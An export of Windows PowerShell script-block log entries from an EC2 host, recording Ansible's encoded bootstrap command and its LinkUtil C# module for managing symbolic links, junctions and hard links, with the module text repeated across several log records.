JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== Engine Version = 5.1.14393.6343 Runspace ID = e4148d9c-9afb-471c-969d-712164c4d6c5 Pipeline ID = 10 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 34 User = EC2AMAZ-9JTOML5\Administrator Connected User = Shell ID = Microsoft.PowerShell CommandInvocation(Add-Type): "Add-Type" ParameterBinding(Add-Type): name="TypeDefinition"; value="using Microsoft.Win32.SafeHandles; using System; using System.Collections.Generic; using System.IO; using System.Runtime.InteropServices; using System.Text; namespace Ansible { public enum LinkType { SymbolicLink, JunctionPoint, HardLink } public class LinkUtilWin32Exception : System.ComponentModel.Win32Exception { private string _msg; public LinkUtilWin32Exception(string message) : this(Marshal.GetLastWin32Error(), message) { } public LinkUtilWin32Exception(int errorCode, string message) : base(errorCode) { _msg = String.Format("{0} ({1}, Win32ErrorCode {2})", message, base.Message, errorCode); } public override string Message { get { return _msg; } } public static explicit operator LinkUtilWin32Exception(string message) { return new LinkUtilWin32Exception(message); } } public class LinkInfo { public LinkType Type { get; internal set; } public string PrintName { get; internal set; } public string SubstituteName { get; internal set; } public string AbsolutePath { get; internal set; } public string TargetPath { get; internal set; } public string[] HardTargets { get; internal set; } } [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public struct REPARSE_DATA_BUFFER { public UInt32 ReparseTag; public UInt16 ReparseDataLength; public UInt16 Reserved; public UInt16 SubstituteNameOffset; public UInt16 SubstituteNameLength; public UInt16 PrintNameOffset; public UInt16 PrintNameLength; [MarshalAs(UnmanagedType.ByValArray, SizeConst = LinkUtil.MAXIMUM_REPARSE_DATA_BUFFER_SIZE)] public char[] PathBuffer; } public class LinkUtil { public const int MAXIMUM_REPARSE_DATA_BUFFER_SIZE = 1024 * 16; private const UInt32 FILE_FLAG_BACKUP_SEMANTICS = 0x02000000; private const UInt32 FILE_FLAG_OPEN_REPARSE_POINT = 0x00200000; private const UInt32 FSCTL_GET_REPARSE_POINT = 0x000900A8; private const UInt32 FSCTL_SET_REPARSE_POINT = 0x000900A4; private const UInt32 FILE_DEVICE_FILE_SYSTEM = 0x00090000; private const UInt32 IO_REPARSE_TAG_MOUNT_POINT = 0xA0000003; private const UInt32 IO_REPARSE_TAG_SYMLINK = 0xA000000C; private const UInt32 SYMLINK_FLAG_RELATIVE = 0x00000001; private const Int64 INVALID_HANDLE_VALUE = -1; private const UInt32 SIZE_OF_WCHAR = 2; private const UInt32 SYMBOLIC_LINK_FLAG_FILE = 0x00000000; private const UInt32 SYMBOLIC_LINK_FLAG_DIRECTORY = 0x00000001; [DllImport("kernel32.dll", CharSet = CharSet.Auto)] private static extern SafeFileHandle CreateFile( string lpFileName, [MarshalAs(UnmanagedType.U4)] FileAccess dwDesiredAccess, [MarshalAs(UnmanagedType.U4)] FileShare dwShareMode, IntPtr lpSecurityAttributes, [MarshalAs(UnmanagedType.U4)] FileMode dwCreationDisposition, UInt32 dwFlagsAndAttributes, IntPtr hTemplateFile); // Used by GetReparsePointInfo() [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool DeviceIoControl( SafeFileHandle hDevice, UInt32 dwIoControlCode, IntPtr lpInBuffer, UInt32 nInBufferSize, out REPARSE_DATA_BUFFER lpOutBuffer, UInt32 nOutBufferSize, out UInt32 lpBytesReturned, IntPtr lpOverlapped); // Used by CreateJunctionPoint() [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool DeviceIoControl( SafeFileHandle hDevice, UInt32 dwIoControlCode, REPARSE_DATA_BUFFER lpInBuffer, UInt32 nInBufferSize, IntPtr lpOutBuffer, UInt32 nOutBufferSize, out UInt32 lpBytesReturned, IntPtr lpOverlapped); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool GetVolumePathName( string lpszFileName, StringBuilder lpszVolumePathName, ref UInt32 cchBufferLength); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern IntPtr FindFirstFileNameW( string lpFileName, UInt32 dwFlags, ref UInt32 StringLength, StringBuilder LinkName); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool FindNextFileNameW( IntPtr hFindStream, ref UInt32 StringLength, StringBuilder LinkName); [DllImport("kernel32.dll", SetLastError = true)] private static extern bool FindClose( IntPtr hFindFile); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool RemoveDirectory( string lpPathName); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool DeleteFile( string lpFileName); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool CreateSymbolicLink( string lpSymlinkFileName, string lpTargetFileName, UInt32 dwFlags); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool CreateHardLink( string lpFileName, string lpExistingFileName, IntPtr lpSecurityAttributes); public static LinkInfo GetLinkInfo(string linkPath) { FileAttributes attr = File.GetAttributes(linkPath); if (attr.HasFlag(FileAttributes.ReparsePoint)) return GetReparsePointInfo(linkPath); if (!attr.HasFlag(FileAttributes.Directory)) return GetHardLinkInfo(linkPath); return null; } public static void DeleteLink(string linkPath) { bool success; FileAttributes attr = File.GetAttributes(linkPath); if (attr.HasFlag(FileAttributes.Directory)) { success = RemoveDirectory(linkPath); } else { success = DeleteFile(linkPath); } if (!success) throw new LinkUtilWin32Exception(String.Format("Failed to delete link at {0}", linkPath)); } public static void CreateLink(string linkPath, String linkTarget, LinkType linkType) { switch (linkType) { case LinkType.SymbolicLink: UInt32 linkFlags; FileAttributes attr = File.GetAttributes(linkTarget); if (attr.HasFlag(FileAttributes.Directory)) linkFlags = SYMBOLIC_LINK_FLAG_DIRECTORY; else linkFlags = SYMBOLIC_LINK_FLAG_FILE; if (!CreateSymbolicLink(linkPath, linkTarget, linkFlags)) throw new LinkUtilWin32Exception(String.Format("CreateSymbolicLink({0}, {1}, {2}) failed", linkPath, linkTarget, linkFlags)); break; case LinkType.JunctionPoint: CreateJunctionPoint(linkPath, linkTarget); break; case LinkType.HardLink: if (!CreateHardLink(linkPath, linkTarget, IntPtr.Zero)) throw new LinkUtilWin32Exception(String.Format("CreateHardLink({0}, {1}) failed", linkPath, linkTarget)); break; } } private static LinkInfo GetHardLinkInfo(string linkPath) { UInt32 maxPath = 260; List<string> result = new List<string>(); StringBuilder sb = new StringBuilder((int)maxPath); UInt32 stringLength = maxPath; if (!GetVolumePathName(linkPath, sb, ref stringLength)) throw new LinkUtilWin32Exception("GetVolumePathName() failed"); string volume = sb.ToString(); stringLength = maxPath; IntPtr findHandle = FindFirstFileNameW(linkPath, 0, ref stringLength, sb); if (findHandle.ToInt64() != INVALID_HANDLE_VALUE) { try { do { string hardLinkPath = sb.ToString(); if (hardLinkPath.StartsWith("\\")) hardLinkPath = hardLinkPath.Substring(1, hardLinkPath.Length - 1); result.Add(Path.Combine(volume, hardLinkPath)); stringLength = maxPath; } while (FindNextFileNameW(findHandle, ref stringLength, sb)); } finally { FindClose(findHandle); } } if (result.Count > 1) return new LinkInfo { Type = LinkType.HardLink, HardTargets = result.ToArray() }; return null; } private static LinkInfo GetReparsePointInfo(string linkPath) { SafeFileHandle fileHandle = CreateFile( linkPath, FileAccess.Read, FileShare.None, IntPtr.Zero, FileMode.Open, FILE_FLAG_OPEN_REPARSE_POINT | FILE_FLAG_BACKUP_SEMANTICS, IntPtr.Zero); if (fileHandle.IsInvalid) throw new LinkUtilWin32Exception(String.Format("CreateFile({0}) failed", linkPath)); REPARSE_DATA_BUFFER buffer = new REPARSE_DATA_BUFFER(); UInt32 bytesReturned; try { if (!DeviceIoControl( fileHandle, FSCTL_GET_REPARSE_POINT, IntPtr.Zero, 0, out buffer, MAXIMUM_REPARSE_DATA_BUFFER_SIZE, out bytesReturned, IntPtr.Zero)) throw new LinkUtilWin32Exception(String.Format("DeviceIoControl() failed for file at {0}", linkPath)); } finally { fileHandle.Dispose(); } bool isRelative = false; int pathOffset = 0; LinkType linkType; if (buffer.ReparseTag == IO_REPARSE_TAG_SYMLINK) { UInt32 bufferFlags = Convert.ToUInt32(buffer.PathBuffer[0]) + Convert.ToUInt32(buffer.PathBuffer[1]); if (bufferFlags == SYMLINK_FLAG_RELATIVE) isRelative = true; pathOffset = 2; linkType = LinkType.SymbolicLink; } else if (buffer.ReparseTag == IO_REPARSE_TAG_MOUNT_POINT) { linkType = LinkType.JunctionPoint; } else { string errorMessage = String.Format("Invalid Reparse Tag: {0}", buffer.ReparseTag.ToString()); throw new Exception(errorMessage); } string printName = new string(buffer.PathBuffer, (int)(buffer.PrintNameOffset / SIZE_OF_WCHAR) + pathOffset, (int)(buffer.PrintNameLength / SIZE_OF_WCHAR)); string substituteName = new string(buffer.PathBuffer, (int)(buffer.SubstituteNameOffset / SIZE_OF_WCHAR) + pathOffset, (int)(buffer.SubstituteNameLength / SIZE_OF_WCHAR)); // TODO: should we check for \?\UNC\server for convert it to the NT style \\server path // Remove the leading Windows object directory \?\ from the path if present string targetPath = substituteName; if (targetPath.StartsWith("\\??\\")) targetPath = targetPath.Substring(4, targetPath.Length - 4); string absolutePath = targetPath; if (isRelative) absolutePath = Path.GetFullPath(Path.Combine(new FileInfo(linkPath).Directory.FullName, targetPath)); return new LinkInfo { Type = linkType, PrintName = printName, SubstituteName = substituteName, AbsolutePath = absolutePath, TargetPath = targetPath }; } private static void CreateJunctionPoint(string linkPath, string linkTarget) { // We need to create the link as a dir beforehand Directory.CreateDirectory(linkPath); SafeFileHandle fileHandle = CreateFile( linkPath, FileAccess.Write, FileShare.Read | FileShare.Write | FileShare.None, IntPtr.Zero, FileMode.Open, FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, IntPtr.Zero); if (fileHandle.IsInvalid) throw new LinkUtilWin32Exception(String.Format("CreateFile({0}) failed", linkPath)); try { string substituteName = "\\??\\" + Path.GetFullPath(linkTarget); string printName = linkTarget; REPARSE_DATA_BUFFER buffer = new REPARSE_DATA_BUFFER(); buffer.SubstituteNameOffset = 0; buffer.SubstituteNameLength = (UInt16)(substituteName.Length * SIZE_OF_WCHAR); buffer.PrintNameOffset = (UInt16)(buffer.SubstituteNameLength + 2); buffer.PrintNameLength = (UInt16)(printName.Length * SIZE_OF_WCHAR); buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT; buffer.ReparseDataLength = (UInt16)(buffer.SubstituteNameLength + buffer.PrintNameLength + 12); buffer.PathBuffer = new char[MAXIMUM_REPARSE_DATA_BUFFER_SIZE]; byte[] unicodeBytes = Encoding.Unicode.GetBytes(substituteName + "\0" + printName); char[] pathBuffer = Encoding.Unicode.GetChars(unicodeBytes); Array.Copy(pathBuffer, buffer.PathBuffer, pathBuffer.Length); UInt32 bytesReturned; if (!DeviceIoControl( fileHandle, FSCTL_SET_REPARSE_POINT, buffer, (UInt32)(buffer.ReparseDataLength + 8), IntPtr.Zero, 0, out bytesReturned, IntPtr.Zero)) throw new LinkUtilWin32Exception(String.Format("DeviceIoControl() failed to create junction point at {0} to {1}", linkPath, linkTarget)); } finally { fileHandle.Dispose(); } } } }" 4104152150x0154667Microsoft-Windows-PowerShell/OperationalEC2AMAZ-9JTOML511Function Load-LinkUtils() { $link_util = @' using Microsoft.Win32.SafeHandles; using System; using System.Collections.Generic; using System.IO; using System.Runtime.InteropServices; using System.Text; namespace Ansible { public enum LinkType { SymbolicLink, JunctionPoint, HardLink } public class LinkUtilWin32Exception : System.ComponentModel.Win32Exception { private string _msg; public LinkUtilWin32Exception(string message) : this(Marshal.GetLastWin32Error(), message) { } public LinkUtilWin32Exception(int errorCode, string message) : base(errorCode) { _msg = String.Format("{0} ({1}, Win32ErrorCode {2})", message, base.Message, errorCode); } public override string Message { get { return _msg; } } public static explicit operator LinkUtilWin32Exception(string message) { return new LinkUtilWin32Exception(message); } } public class LinkInfo { public LinkType Type { get; internal set; } public string PrintName { get; internal set; } public string SubstituteName { get; internal set; } public string AbsolutePath { get; internal set; } public string TargetPath { get; internal set; } public string[] HardTargets { get; internal set; } } [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public struct REPARSE_DATA_BUFFER { public UInt32 ReparseTag; public UInt16 ReparseDataLength; public UInt16 Reserved; public UInt16 SubstituteNameOffset; public UInt16 SubstituteNameLength; public UInt16 PrintNameOffset; public UInt16 PrintNameLength; [MarshalAs(UnmanagedType.ByValArray, SizeConst = LinkUtil.MAXIMUM_REPARSE_DATA_BUFFER_SIZE)] public char[] PathBuffer; } public class LinkUtil { public const int MAXIMUM_REPARSE_DATA_BUFFER_SIZE = 1024 * 16; private const UInt32 FILE_FLAG_BACKUP_SEMANTICS = 0x02000000; private const UInt32 FILE_FLAG_OPEN_REPARSE_POINT = 0x00200000; private const UInt32 FSCTL_GET_REPARSE_POINT = 0x000900A8; private const UInt32 FSCTL_SET_REPARSE_POINT = 0x000900A4; private const UInt32 FILE_DEVICE_FILE_SYSTEM = 0x00090000; private const UInt32 IO_REPARSE_TAG_MOUNT_POINT = 0xA0000003; private const UInt32 IO_REPARSE_TAG_SYMLINK = 0xA000000C; private const UInt32 SYMLINK_FLAG_RELATIVE = 0x00000001; private const Int64 INVALID_HANDLE_VALUE = -1; private const UInt32 SIZE_OF_WCHAR = 2; private const UInt32 SYMBOLIC_LINK_FLAG_FILE = 0x00000000; private const UInt32 SYMBOLIC_LINK_FLAG_DIRECTORY = 0x00000001; [DllImport("kernel32.dll", CharSet = CharSet.Auto)] private static extern SafeFileHandle CreateFile( string lpFileName, [MarshalAs(UnmanagedType.U4)] FileAccess dwDesiredAccess, [MarshalAs(UnmanagedType.U4)] FileShare dwShareMode, IntPtr lpSecurityAttributes, [MarshalAs(UnmanagedType.U4)] FileMode dwCreationDisposition, UInt32 dwFlagsAndAttributes, IntPtr hTemplateFile); // Used by GetReparsePointInfo() [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool DeviceIoControl( SafeFileHandle hDevice, UInt32 dwIoControlCode, IntPtr lpInBuffer, UInt32 nInBufferSize, out REPARSE_DATA_BUFFER lpOutBuffer, UInt32 nOutBufferSize, out UInt32 lpBytesReturned, IntPtr lpOverlapped); // Used by CreateJunctionPoint() [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool DeviceIoControl( SafeFileHandle hDevice, UInt32 dwIoControlCode, REPARSE_DATA_BUFFER lpInBuffer, UInt32 nInBufferSize, IntPtr lpOutBuffer, UInt32 nOutBufferSize, out UInt32 lpBytesReturned, IntPtr lpOverlapped); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool GetVolumePathName( string lpszFileName, StringBuilder lpszVolumePathName, ref UInt32 cchBufferLength); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern IntPtr FindFirstFileNameW( string lpFileName, UInt32 dwFlags, ref UInt32 StringLength, StringBuilder LinkName); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool FindNextFileNameW( IntPtr hFindStream, ref UInt32 StringLength, StringBuilder LinkName); [DllImport("kernel32.dll", SetLastError = true)] private static extern bool FindClose( IntPtr hFindFile); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool RemoveDirectory( string lpPathName); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool DeleteFile( string lpFileName); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool CreateSymbolicLink( string lpSymlinkFileName, string lpTargetFileName, UInt32 dwFlags); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool CreateHardLink( string lpFileName, string lpExistingFileName, IntPtr lpSecurityAttributes); public static LinkInfo GetLinkInfo(string linkPath) { FileAttributes attr = File.GetAttributes(linkPath); if (attr.HasFlag(FileAttributes.ReparsePoint)) return GetReparsePointInfo(linkPath); if (!attr.HasFlag(FileAttributes.Directory)) return GetHardLinkInfo(linkPath); return null; } public static void DeleteLink(string linkPath) { bool success; FileAttributes attr = File.GetAttributes(linkPath); if (attr.HasFlag(FileAttributes.Directory)) { success = RemoveDirectory(linkPath); } else { success = DeleteFile(linkPath); } if (!success) throw new LinkUtilWin32Exception(String.Format("Failed to delete link at {0}", linkPath)); } public static void CreateLink(string linkPath, String linkTarget, LinkType linkType) { switch (linkType) { case LinkType.SymbolicLink: UInt32 linkFlags; FileAttributes attr = File.GetAttributes(linkTarget); if (attr.HasFlag(FileAttributes.Directory)) linkFlags = SYMBOLIC_LINK_FLAG_DIRECTORY; else linkFlags = SYMBOLIC_LINK_FLAG_FILE; if (!CreateSymbolicLink(linkPath, linkTarget, linkFlags)) throw new LinkUtilWin32Exception(String.Format("CreateSymbolicLink({0}, {1}, {2}) failed", linkPath, linkTarget, linkFlags)); break; case LinkType.JunctionPoint: CreateJunctionPoint(linkPath, linkTarget); break; case LinkType.HardLink: if (!CreateHardLink(linkPath, linkTarget, IntPtr.Zero)) throw new LinkUtilWin32Exception(String.Format("CreateHardLink({0}, {1}) failed", linkPath, linkTarget)); break; } } private static LinkInfo GetHardLinkInfo(string linkPath) { UInt32 maxPath = 260; List<string> result = new List<string>(); StringBuilder sb = new StringBuilder((int)maxPath); UInt32 stringLength = maxPath; if (!GetVolumePathName(linkPath, sb, ref stringLength)) throw new LinkUtilWin32Exception("GetVolumePathName() failed"); string volume = sb.ToString(); stringLength = maxPath; IntPtr findHandle = FindFirstFileNameW(linkPath, 0, ref stringLength, sb); if (findHandle.ToInt64() != INVALID_HANDLE_VALUE) { try { do { string hardLinkPath = sb.ToString(); if (hardLinkPath.StartsWith("\\")) hardLinkPath = hardLinkPath.Substring(1, hardLinkPath.Length - 1); result.Add(Path.Combine(volume, hardLinkPath)); stringLength = maxPath; } while (FindNextFileNameW(findHandle, ref stringLength, sb)); } finally { FindClose(findHandle); } } if (result.Count > 1) return new LinkInfo { Type = LinkType.HardLink, HardTargets = result.ToArray() }; return null; } private static LinkInfo GetReparsePointInfo(string linkPath) { SafeFileHandle fileHandle = CreateFile( linkPath, FileAccess.Read, FileShare.None, IntPtr.Zero, FileMode.Open, FILE_FLAG_OPEN_REPARSE_POINT | FILE_FLAG_BACKUP_SEMANTICS, IntPtr.Zero); if (fileHandle.IsInvalid) throw new LinkUtilWin32Exception(String.Format("CreateFile({0}) failed", linkPath)); REPARSE_DATA_BUFFER buffer = new REPARSE_DATA_BUFFER(); UInt32 bytesReturned; try { if (!DeviceIoControl( fileHandle, FSCTL_GET_REPARSE_POINT, IntPtr.Zero, 0, out buffer, MAXIMUM_REPARSE_DATA_BUFFER_SIZE, out bytesReturned, IntPtr.Zero)) throw new LinkUtilWin32Exception(String.Format("DeviceIoControl() failed for file at {0}", linkPath)); } finally { fileHandle.Dispose(); } bool isRelative = false; int pathOffset = 0; LinkType linkType; if (buffer.ReparseTag == IO_REPARSE_TAG_SYMLINK) { UInt32 bufferFlags = Convert.ToUInt32(buffer.PathBuffer[0]) + Convert.ToUInt32(buffer.PathBuffer[1]); if (bufferFlags == SYMLINK_FLAG_RELATIVE) isRelative = true; pathOffset = 2; linkType = LinkType.SymbolicLink; } else if (buffer.ReparseTag == IO_REPARSE_TAG_MOUNT_POINT) { linkType = LinkType.JunctionPoint; } else { string errorMessage = String.Format("Invalid Reparse Tag: {0}", buffer.ReparseTag.ToString()); throw new Exception(errorMessage); } string printName = new string(buffer.PathBuffer, (int)(buffer.PrintNameOffset / SIZE_OF_WCHAR) + pathOffset, (int)(buffer.PrintNameLength / SIZE_OF_WCHAR)); string substituteName = new string(buffer.PathBuffer, (int)(buffer.SubstituteNameOffset / SIZE_OF_WCHAR) + pathOffset, (int)(buffer.SubstituteNameLength / SIZE_OF_WCHAR)); // TODO: should we check for \?\UNC\server for convert it to the NT style \\server path // Remove the leading Windows object directory \?\ from the path if present string targetPath = substituteName; if (targetPath.StartsWith("\\??\\")) targetPath = targetPath.Substring(4, targetPath.Length - 4); string absolutePath = targetPath; if (isRelative) absolutePath = Path.GetFullPath(Path.Combine(new FileInfo(linkPath).Directory.FullName, targetPath)); return new LinkInfo { Type = linkType, PrintName = printName, SubstituteName = substituteName, AbsolutePath = absolutePath, TargetPath = targetPath }; } private static void CreateJunctionPoint(string linkPath, string linkTarget) { // We need to create the link as a dir beforehand Directory.CreateDirectory(linkPath); SafeFileHandle fileHandle = CreateFile( linkPath, FileAccess.Write, FileShare.Read | FileShare.Write | FileShare.None, IntPtr.Zero, FileMode.Open, FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, IntPtr.Zero); if (fileHandle.IsInvalid) throw new LinkUtilWin32Exception(String.Format("CreateFile({0}) failed", linkPath)); try { string substituteName = "\\??\\" + Path.GetFullPath(linkTarget); string printName = linkTarget; REPARSE_DATA_BUFFER buffer = new REPARSE_DATA_BUFFER(); buffer.SubstituteNameOffset = 0; buffer.SubstituteNameLength = (UInt16)(substituteName.Length * SIZE_OF_WCHAR); buffer.PrintNameOffset = (UInt16)(buffer.SubstituteNameLength + 2); buffer.PrintNameLength = (UInt16)(printName.Length * SIZE_OF_WCHAR); buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT; buffer.ReparseDataLength = (UInt16)(buffer.SubstituteNameLength + buffer.PrintNameLength + 12); buffer.PathBuffer = new char[MAXIMUM_REPARSE_DATA_BUFFER_SIZE]; byte[] unicodeBytes = Encoding.Unicode.GetBytes(substituteName + "\0" + printName); char[] pathBuffer = Encoding.Unicode.GetChars(unicodeBytes); Array.Copy(pathBuffer, buffer.PathBuffer, pathBuffer.Length); UInt32 bytesReturned; if (!DeviceIoControl( fileHandle, FSCTL_SET_REPARSE_POINT, buffer, (UInt32)(buffer.ReparseDataLength + 8), IntPtr.Zero, 0, out bytesReturned, IntPtr.Zero)) throw new LinkUtilWin32Exception(String.Format("DeviceIoControl() failed to create junction point at {0} to {1}", linkPath, linkTarget)); } finally { fileHandle.Dispose(); } } } } '@ # FUTURE: find a better way to get the _ansible_remote_tmp variable $original_tmp = $env:TMP $original_lib = $env:LIB $remote_tmp = $original_tmp $module_params = Get-Variable -Name complex_args -ErrorAction SilentlyContinue if ($module_params) { if ($module_params.Value.ContainsKey("_ansible_remote_tmp") ) { $remote_tmp = $module_params.Value["_ansible_remote_tmp"] $remote_tmp = [System.Environment]::ExpandEnvironmentVariables($remote_tmp) } } $env:TMP = $remote_tmp $env:LIB = $null Add-Type -TypeDefinition $link_util $env:TMP = $original_tmp $env:LIB = $original_lib # enable the SeBackupPrivilege if it is disabled $state = Get-AnsiblePrivilege -Name SeBackupPrivilege if ($state -eq $false) { Set-AnsiblePrivilege -Name SeBackupPrivilege -Value $true } }ab17a6b2-b95c-48d0-b07c-9cd42f4feee8 4104132150x0154645Microsoft-Windows-PowerShell/OperationalEC2AMAZ-9JTOML511# Copyright (c) 2017 Ansible Project # Simplified BSD License (see licenses/simplified_bsd.txt or https://opensource.org/licenses/BSD-2-Clause) #Requires -Module Ansible.ModuleUtils.PrivilegeUtil Function Load-LinkUtils() { $link_util = @' using Microsoft.Win32.SafeHandles; using System; using System.Collections.Generic; using System.IO; using System.Runtime.InteropServices; using System.Text; namespace Ansible { public enum LinkType { SymbolicLink, JunctionPoint, HardLink } public class LinkUtilWin32Exception : System.ComponentModel.Win32Exception { private string _msg; public LinkUtilWin32Exception(string message) : this(Marshal.GetLastWin32Error(), message) { } public LinkUtilWin32Exception(int errorCode, string message) : base(errorCode) { _msg = String.Format("{0} ({1}, Win32ErrorCode {2})", message, base.Message, errorCode); } public override string Message { get { return _msg; } } public static explicit operator LinkUtilWin32Exception(string message) { return new LinkUtilWin32Exception(message); } } public class LinkInfo { public LinkType Type { get; internal set; } public string PrintName { get; internal set; } public string SubstituteName { get; internal set; } public string AbsolutePath { get; internal set; } public string TargetPath { get; internal set; } public string[] HardTargets { get; internal set; } } [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public struct REPARSE_DATA_BUFFER { public UInt32 ReparseTag; public UInt16 ReparseDataLength; public UInt16 Reserved; public UInt16 SubstituteNameOffset; public UInt16 SubstituteNameLength; public UInt16 PrintNameOffset; public UInt16 PrintNameLength; [MarshalAs(UnmanagedType.ByValArray, SizeConst = LinkUtil.MAXIMUM_REPARSE_DATA_BUFFER_SIZE)] public char[] PathBuffer; } public class LinkUtil { public const int MAXIMUM_REPARSE_DATA_BUFFER_SIZE = 1024 * 16; private const UInt32 FILE_FLAG_BACKUP_SEMANTICS = 0x02000000; private const UInt32 FILE_FLAG_OPEN_REPARSE_POINT = 0x00200000; private const UInt32 FSCTL_GET_REPARSE_POINT = 0x000900A8; private const UInt32 FSCTL_SET_REPARSE_POINT = 0x000900A4; private const UInt32 FILE_DEVICE_FILE_SYSTEM = 0x00090000; private const UInt32 IO_REPARSE_TAG_MOUNT_POINT = 0xA0000003; private const UInt32 IO_REPARSE_TAG_SYMLINK = 0xA000000C; private const UInt32 SYMLINK_FLAG_RELATIVE = 0x00000001; private const Int64 INVALID_HANDLE_VALUE = -1; private const UInt32 SIZE_OF_WCHAR = 2; private const UInt32 SYMBOLIC_LINK_FLAG_FILE = 0x00000000; private const UInt32 SYMBOLIC_LINK_FLAG_DIRECTORY = 0x00000001; [DllImport("kernel32.dll", CharSet = CharSet.Auto)] private static extern SafeFileHandle CreateFile( string lpFileName, [MarshalAs(UnmanagedType.U4)] FileAccess dwDesiredAccess, [MarshalAs(UnmanagedType.U4)] FileShare dwShareMode, IntPtr lpSecurityAttributes, [MarshalAs(UnmanagedType.U4)] FileMode dwCreationDisposition, UInt32 dwFlagsAndAttributes, IntPtr hTemplateFile); // Used by GetReparsePointInfo() [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool DeviceIoControl( SafeFileHandle hDevice, UInt32 dwIoControlCode, IntPtr lpInBuffer, UInt32 nInBufferSize, out REPARSE_DATA_BUFFER lpOutBuffer, UInt32 nOutBufferSize, out UInt32 lpBytesReturned, IntPtr lpOverlapped); // Used by CreateJunctionPoint() [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool DeviceIoControl( SafeFileHandle hDevice, UInt32 dwIoControlCode, REPARSE_DATA_BUFFER lpInBuffer, UInt32 nInBufferSize, IntPtr lpOutBuffer, UInt32 nOutBufferSize, out UInt32 lpBytesReturned, IntPtr lpOverlapped); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool GetVolumePathName( string lpszFileName, StringBuilder lpszVolumePathName, ref UInt32 cchBufferLength); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern IntPtr FindFirstFileNameW( string lpFileName, UInt32 dwFlags, ref UInt32 StringLength, StringBuilder LinkName); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool FindNextFileNameW( IntPtr hFindStream, ref UInt32 StringLength, StringBuilder LinkName); [DllImport("kernel32.dll", SetLastError = true)] private static extern bool FindClose( IntPtr hFindFile); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool RemoveDirectory( string lpPathName); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool DeleteFile( string lpFileName); [DllImport("kernel32.dll", 